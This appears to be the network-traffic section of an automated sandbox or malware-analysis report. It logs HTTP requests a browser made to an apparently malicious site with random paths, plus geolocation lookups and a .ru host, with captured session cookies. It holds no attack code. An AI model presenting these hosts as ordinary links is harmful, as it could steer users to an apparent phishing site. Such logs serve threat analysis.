Source: global traffic	HTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://3pz.bughtswo.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://3pz.bughtswo.com/admi/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZGMUFVc1RsUitTa1NhUXYvaCtvK1E9PSIsInZhbHVlIjoiK0I5QXNPWERMcFJvenVtNGg3RDNFajZPV1RtaXFYUDJteDZOOVU3eitibVUya2tienhIWklKaEpyenhzcS9YUjZoYU02bkVzUU9raUlGbUlaeHNra0tXSDQ0MzhDRVRrU2NyZktpMUw5NStJeDFmWCtFUlRwb0NOU2w5RSt1emEiLCJtYWMiOiIyN2NlNGZjMmU4MGE1NWUyYTBlMTdiNjUwZDBlNzJmN2ViZjg0ZTUzYzExMDYyODE2YThiNjM1YWZmZGU2ZGQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlZ5SHJVUkJmaXVEQzFnbG5BOGp0Y3c9PSIsInZhbHVlIjoiaFdaSFp6bVVQcHhqWmZvejRzZnR3TDloaW9LRG01UkZWaWRMWDdIUGRYSi9wZzNtQjVka2htVTQxaEhmeGZOK0lZQWdMb1hvWGVDNlZMTy9tUC9tekRuQmxzMlYvZzlMbXlxSjdmeUJNVlZvWkNNdDBoTTlLWmtWVGYwaVQ0T0EiLCJtYWMiOiJhODcwNTAyNDRkMjUwZTdhZmQzNGY2MGI2NTQ3NzVlNGFkMzUzYzc1OWNhZDUxOTJjOGIzMTlhMmNmODgzYjI4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /admi/ HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ik50VGlCek1DR2xDSG1Xb3MzNkRwZFE9PSIsInZhbHVlIjoiTnNjdGRaQitPM25hM09XYU1nR1lIdEFyYmlSRmxkRnEwUlBQdTVXMjBzS1RvbHFDNnVqbDI0UzBrc1RsQ3RnUElUalZVSU5JbUtCZEN3N1BLZDh1dFhNNkdES2p2S0pGNmFNVEI5dzlEZ1l3QlhubENURGNONDVYeWNDYkRaWTEiLCJtYWMiOiJmZjM4NDdmMjBlYjhjMDY3MGRjYjM0YmM3Nzc5YmJlYzdiZjdkYmViZTk3ZmNjNWE2ODc1YjczMmVjZDJhMTIzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Imw5NWUvdDRYKzgwZ1RVY0pXNGVDTXc9PSIsInZhbHVlIjoiZXd6YnU3ZU1CMWMwbmtjUmdpVHJVdDBES01GWi8zcFFiSWVlZElvNG9lRkpFV2VTYUcwSWw5eldVRk1UOW1UUmU1VzhveUVpZlhCUlhJZlF4SHFWQUdORTFtVjhmeHd1TmFzUWljRjlFeDJFcUpHV1hSQ3FuOVZhSTBoWmRpNWgiLCJtYWMiOiIwMDUxNDcxZDM5NzQ4OTg2NWJhZDBkM2FmMTMzYjUyNmU0NTg0ZjYyMTk3NzA4YTkyOWU4ODZmMGFkZjU4NDkwIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /admi/ HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlQrdWpDS1NjanpDMEVVS2Fpc29YSlE9PSIsInZhbHVlIjoiUWFzd2JyeWVmd2U3YTAzTVpHZjdCVHZFbUpWZTJWQ1h0VTdKZ2FNZTgvenI4RG9RUG9LaDFySlFXN3RjM2tnYURJNnk5bFVBZElLUU1RZ0ZENnErWEZBYnVBMGRrT2VLcjZ6bGZ2c3ZQMWp6aEIweWlxSmZ6QlJGNUtBUi82TmMiLCJtYWMiOiIyN2QwOTQ0ZWJlNWFmZDFhZWE2N2U1ZWJlNzdlMjQ5ZDdkZjg4MDljNzM3YzQ5MWQ5MjQ0N2RhNTcyZTk5YTA3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IklkNUNwWU5pTU1kanROVkx4WjIrcGc9PSIsInZhbHVlIjoibnIrdDgyeGRrQkxoTUtoQ2F4MnRuV1BPdzJtU2tXTGtDVEdLS2hNbU42cFBxR3JVbU9MeUlvVitqclp0QmlZb2o3U2xEajVMb1ExeGpZR05qcW5kNnF6SDdqMmJSTkl4MzlabVo2VXZYV09kendLbFFmbmpWY0NuK0FYVGtGQ0QiLCJtYWMiOiI1NjIxODNhOGIzNjQ0YjEyZTliNDBjNjk4YTMwMmExNGE0MTgwMDFhODIzMzk2Nzg0YmQ2MDQxOWIxMGRjMTg5IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=ecnS.mYWfjgtSPeKE.VU0essmRbbGKBeDJcHf7fAH_Y-1742259281-1.0.1.1-v_dqiAENN0EBJmyIrLQN3cxB2AWrIxXEj5vblXMAhtsxWjNV089KkK7pBCSOsnwCePZUAfAA7PF5PO7nLUgptte98O2WqxuLSl2k.SeC2dUIf-None-Match: "6be7ff94b6151f8cfbf08b53a17e2ac1"
Source: global traffic	HTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=ecnS.mYWfjgtSPeKE.VU0essmRbbGKBeDJcHf7fAH_Y-1742259281-1.0.1.1-v_dqiAENN0EBJmyIrLQN3cxB2AWrIxXEj5vblXMAhtsxWjNV089KkK7pBCSOsnwCePZUAfAA7PF5PO7nLUgptte98O2WqxuLSl2k.SeC2dUIf-None-Match: "6be7ff94b6151f8cfbf08b53a17e2ac1"
Source: global traffic	HTTP traffic detected: GET /kella$0zphou HTTP/1.1Host: r7hi.qakaco.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Origin: https://3pz.bughtswo.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kella$0zphou HTTP/1.1Host: r7hi.qakaco.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /admi/ HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://3pz.bughtswo.com/admi/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImY3U01rLzJHWHRRSDlVTWlReXlXMVE9PSIsInZhbHVlIjoieGM5LzR5K3VOS0FJaEo2d2Q0ZStYN3hSaGEweWI5bUE2TlkveXdCdzlabmRSSVVaU091dTArZWNJdUQzb2FYQ3QwaWkvMEtJRWs5bzQ1ZnZOTnlCVDZVZkVaZnVRZHZYNW9PdnZIaGI5b2dOQWFFdmZLcWJrd3cwcEJwMFdNVWgiLCJtYWMiOiI1ZTgxMGI5ZWRmNTM5ZWUyMjQ0ZGQ0ZWMwMzBkZjI4OGYwNDY5ZWMwNDVmYzg0OGQ1ZmVkZTU4NWJlYjJkMjhhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkpDVngxVkFENnE5YU1KOWExSFR0Znc9PSIsInZhbHVlIjoia2cxbmpMbVNJZXp1Z0NacVJabDVlcFJnNVh3ZXlKbitXZDI4ZWptd1Brbm9jRjE5aUYxMGRKaUhOTVNRU25pOFRCTkYyZTVPVmIxVlFiK0orK082S1dTdU9mczYwSlNFc0d6T0E3TjdRY0d5NTJpcWd5eERwLzBhZ0NUUHFjd3oiLCJtYWMiOiJhNzM4YzA0MWY2ZGVjNjZjYmVmYTM3NDQ1M2E0NTRkZDgwZWRlYTMzNGEyMjQwMGEwMjJmNGFmMGMwNGMwZWIyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /wpE72XVhb4Z1pXQe52oRXxRmo HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImY3U01rLzJHWHRRSDlVTWlReXlXMVE9PSIsInZhbHVlIjoieGM5LzR5K3VOS0FJaEo2d2Q0ZStYN3hSaGEweWI5bUE2TlkveXdCdzlabmRSSVVaU091dTArZWNJdUQzb2FYQ3QwaWkvMEtJRWs5bzQ1ZnZOTnlCVDZVZkVaZnVRZHZYNW9PdnZIaGI5b2dOQWFFdmZLcWJrd3cwcEJwMFdNVWgiLCJtYWMiOiI1ZTgxMGI5ZWRmNTM5ZWUyMjQ0ZGQ0ZWMwMzBkZjI4OGYwNDY5ZWMwNDVmYzg0OGQ1ZmVkZTU4NWJlYjJkMjhhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkpDVngxVkFENnE5YU1KOWExSFR0Znc9PSIsInZhbHVlIjoia2cxbmpMbVNJZXp1Z0NacVJabDVlcFJnNVh3ZXlKbitXZDI4ZWptd1Brbm9jRjE5aUYxMGRKaUhOTVNRU25pOFRCTkYyZTVPVmIxVlFiK0orK082S1dTdU9mczYwSlNFc0d6T0E3TjdRY0d5NTJpcWd5eERwLzBhZ0NUUHFjd3oiLCJtYWMiOiJhNzM4YzA0MWY2ZGVjNjZjYmVmYTM3NDQ1M2E0NTRkZDgwZWRlYTMzNGEyMjQwMGEwMjJmNGFmMGMwNGMwZWIyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /zc8QtV1AgOx9d4g80BylSMR67CLPWQsWgy HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii8wUUdQdjhPakNkRjFVYlNodDVHNEE9PSIsInZhbHVlIjoiWXlHZWw5YTlHblk5TFpIclo4Rytjam9xdlVqK3VsVjFNelFFaFQ4NGNEWXRsMFRMWVMxeUV5UlRocmtWaDVRdHdQNk8vbmh4T3d1MDA5VC9vUTRJU1pFbGliRHJ0VHB4dE5XYlh5VC9Jenk4ZitQSHE5SE5UT2RrUGVQQVVTWjgiLCJtYWMiOiIwMGY4YWM5MmUxZmNkZjJiZmJkMzdkMGIyZGMyOWE4MmE2NDEyYmM1YTI3ZGNhOWQyZjdkYjc3YzY1OWVkMGJhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im96ei9UaUtSelMwcVdvM2dLSm05QlE9PSIsInZhbHVlIjoicnFaRnc1bERVVlVQakRPdVRNd3FaZVNvWGR0dmszWHJUQUdiWWErZEw4Tk01SW5HOVFJZFVLejBTQ0ZBczk3RkZYUytIWjM4VXpIZ1N4TytPcEpVYnVXbGY4cUNxQXJmWi93SXdCekpiVk9DNEVadW1HMHN5VlhhcnBCQ0N6THUiLCJtYWMiOiJjNjYzZGE2NmZhNjc0NWJjZjc3ZGU0NjMxNzVhNzQxMzJiOTc1YjhlM2I2MTIxYzAxZGIwMDZlZTBhMTNjZjk2IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWK HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://3pz.bughtswo.com/admi/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii8wUUdQdjhPakNkRjFVYlNodDVHNEE9PSIsInZhbHVlIjoiWXlHZWw5YTlHblk5TFpIclo4Rytjam9xdlVqK3VsVjFNelFFaFQ4NGNEWXRsMFRMWVMxeUV5UlRocmtWaDVRdHdQNk8vbmh4T3d1MDA5VC9vUTRJU1pFbGliRHJ0VHB4dE5XYlh5VC9Jenk4ZitQSHE5SE5UT2RrUGVQQVVTWjgiLCJtYWMiOiIwMGY4YWM5MmUxZmNkZjJiZmJkMzdkMGIyZGMyOWE4MmE2NDEyYmM1YTI3ZGNhOWQyZjdkYjc3YzY1OWVkMGJhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im96ei9UaUtSelMwcVdvM2dLSm05QlE9PSIsInZhbHVlIjoicnFaRnc1bERVVlVQakRPdVRNd3FaZVNvWGR0dmszWHJUQUdiWWErZEw4Tk01SW5HOVFJZFVLejBTQ0ZBczk3RkZYUytIWjM4VXpIZ1N4TytPcEpVYnVXbGY4cUNxQXJmWi93SXdCekpiVk9DNEVadW1HMHN5VlhhcnBCQ0N6THUiLCJtYWMiOiJjNjYzZGE2NmZhNjc0NWJjZjc3ZGU0NjMxNzVhNzQxMzJiOTc1YjhlM2I2MTIxYzAxZGIwMDZlZTBhMTNjZjk2IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /12cgfpYt7Gg84zxyfkj8918 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkUrajFSb0taMGFVQmRRa1BRQ2dPR2c9PSIsInZhbHVlIjoiYmd1QnpZZ1VqdEFQQXZ0b29FWTJTWEtMZ0ltS2s3OXAvV0NrdDRtN3E1OURPSTRrTWpZZEVvdjNMZEh5TGgvVXIzcHhtdDNVSVkwYlFhb05MU1d1NmJ2bTUwdVBHT293cDRlaTRKREVJcitDNHRHdVkrYXBtUmlHVTU0a3o5d0kiLCJtYWMiOiI3ZGFkMDI3M2UxYWJmN2ZmYjljYWViMGY4ZTk0ZWFkMzI4NmJmOWJiY2M5ZDU2OTAyZjZkMWUwZmIwM2U4MDQ3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlRQTjBIU1JEcEp5Rko0SCs5RFlOd2c9PSIsInZhbHVlIjoiRCtaSnFZNFFZM0VHaHBOMXJsQ3VoN040dFlmcHlZQlE4RlhZVitTWFhuTXNLVms0czhVbWpyelhJdkhYZkFoMGR5bnZBTGtKZEd3ZGxST1ZmQ3Q5QTUwSHZ6UEJiT3BabkltVVZRL2RvZ0pjdDFTWjZSMUpPWURNRVBGV3RPa0MiLCJtYWMiOiJlZmNmMDEyOTZmMDlhMzc1ZmRlNzliYjkyNTdiOTYxOGU2MzNlZTE1NWQ1NzMyMWMxODk3NGJmYjE1ZmY1ODUyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /xyI3O4tCtbzsOtrs132Ycd30 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkUrajFSb0taMGFVQmRRa1BRQ2dPR2c9PSIsInZhbHVlIjoiYmd1QnpZZ1VqdEFQQXZ0b29FWTJTWEtMZ0ltS2s3OXAvV0NrdDRtN3E1OURPSTRrTWpZZEVvdjNMZEh5TGgvVXIzcHhtdDNVSVkwYlFhb05MU1d1NmJ2bTUwdVBHT293cDRlaTRKREVJcitDNHRHdVkrYXBtUmlHVTU0a3o5d0kiLCJtYWMiOiI3ZGFkMDI3M2UxYWJmN2ZmYjljYWViMGY4ZTk0ZWFkMzI4NmJmOWJiY2M5ZDU2OTAyZjZkMWUwZmIwM2U4MDQ3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlRQTjBIU1JEcEp5Rko0SCs5RFlOd2c9PSIsInZhbHVlIjoiRCtaSnFZNFFZM0VHaHBOMXJsQ3VoN040dFlmcHlZQlE4RlhZVitTWFhuTXNLVms0czhVbWpyelhJdkhYZkFoMGR5bnZBTGtKZEd3ZGxST1ZmQ3Q5QTUwSHZ6UEJiT3BabkltVVZRL2RvZ0pjdDFTWjZSMUpPWURNRVBGV3RPa0MiLCJtYWMiOiJlZmNmMDEyOTZmMDlhMzc1ZmRlNzliYjkyNTdiOTYxOGU2MzNlZTE1NWQ1NzMyMWMxODk3NGJmYjE1ZmY1ODUyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /56lW6APRQ2ESm07QQ6vYBzijnmTAv3b989110 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkUrajFSb0taMGFVQmRRa1BRQ2dPR2c9PSIsInZhbHVlIjoiYmd1QnpZZ1VqdEFQQXZ0b29FWTJTWEtMZ0ltS2s3OXAvV0NrdDRtN3E1OURPSTRrTWpZZEVvdjNMZEh5TGgvVXIzcHhtdDNVSVkwYlFhb05MU1d1NmJ2bTUwdVBHT293cDRlaTRKREVJcitDNHRHdVkrYXBtUmlHVTU0a3o5d0kiLCJtYWMiOiI3ZGFkMDI3M2UxYWJmN2ZmYjljYWViMGY4ZTk0ZWFkMzI4NmJmOWJiY2M5ZDU2OTAyZjZkMWUwZmIwM2U4MDQ3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlRQTjBIU1JEcEp5Rko0SCs5RFlOd2c9PSIsInZhbHVlIjoiRCtaSnFZNFFZM0VHaHBOMXJsQ3VoN040dFlmcHlZQlE4RlhZVitTWFhuTXNLVms0czhVbWpyelhJdkhYZkFoMGR5bnZBTGtKZEd3ZGxST1ZmQ3Q5QTUwSHZ6UEJiT3BabkltVVZRL2RvZ0pjdDFTWjZSMUpPWURNRVBGV3RPa0MiLCJtYWMiOiJlZmNmMDEyOTZmMDlhMzc1ZmRlNzliYjkyNTdiOTYxOGU2MzNlZTE1NWQ1NzMyMWMxODk3NGJmYjE1ZmY1ODUyIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /klJEJj5AR8FEExIIOG1ZoX9K1rLijUqfl9xv18C2sUweSiWsxciyR4bNuR1awx216 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkUrajFSb0taMGFVQmRRa1BRQ2dPR2c9PSIsInZhbHVlIjoiYmd1QnpZZ1VqdEFQQXZ0b29FWTJTWEtMZ0ltS2s3OXAvV0NrdDRtN3E1OURPSTRrTWpZZEVvdjNMZEh5TGgvVXIzcHhtdDNVSVkwYlFhb05MU1d1NmJ2bTUwdVBHT293cDRlaTRKREVJcitDNHRHdVkrYXBtUmlHVTU0a3o5d0kiLCJtYWMiOiI3ZGFkMDI3M2UxYWJmN2ZmYjljYWViMGY4ZTk0ZWFkMzI4NmJmOWJiY2M5ZDU2OTAyZjZkMWUwZmIwM2U4MDQ3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlRQTjBIU1JEcEp5Rko0SCs5RFlOd2c9PSIsInZhbHVlIjoiRCtaSnFZNFFZM0VHaHBOMXJsQ3VoN040dFlmcHlZQlE4RlhZVitTWFhuTXNLVms0czhVbWpyelhJdkhYZkFoMGR5bnZBTGtKZEd3ZGxST1ZmQ3Q5QTUwSHZ6UEJiT3BabkltVVZRL2RvZ0pjdDFTWjZSMUpPWURNRVBGV3RPa0MiLCJtYWMiOiJlZmNmMDEyOTZmMDlhMzc1ZmRlNzliYjkyNTdiOTYxOGU2MzNlZTE1NWQ1NzMyMWMxODk3NGJmYjE1ZmY1ODUyIiwidGFnIjoiIn0%3D
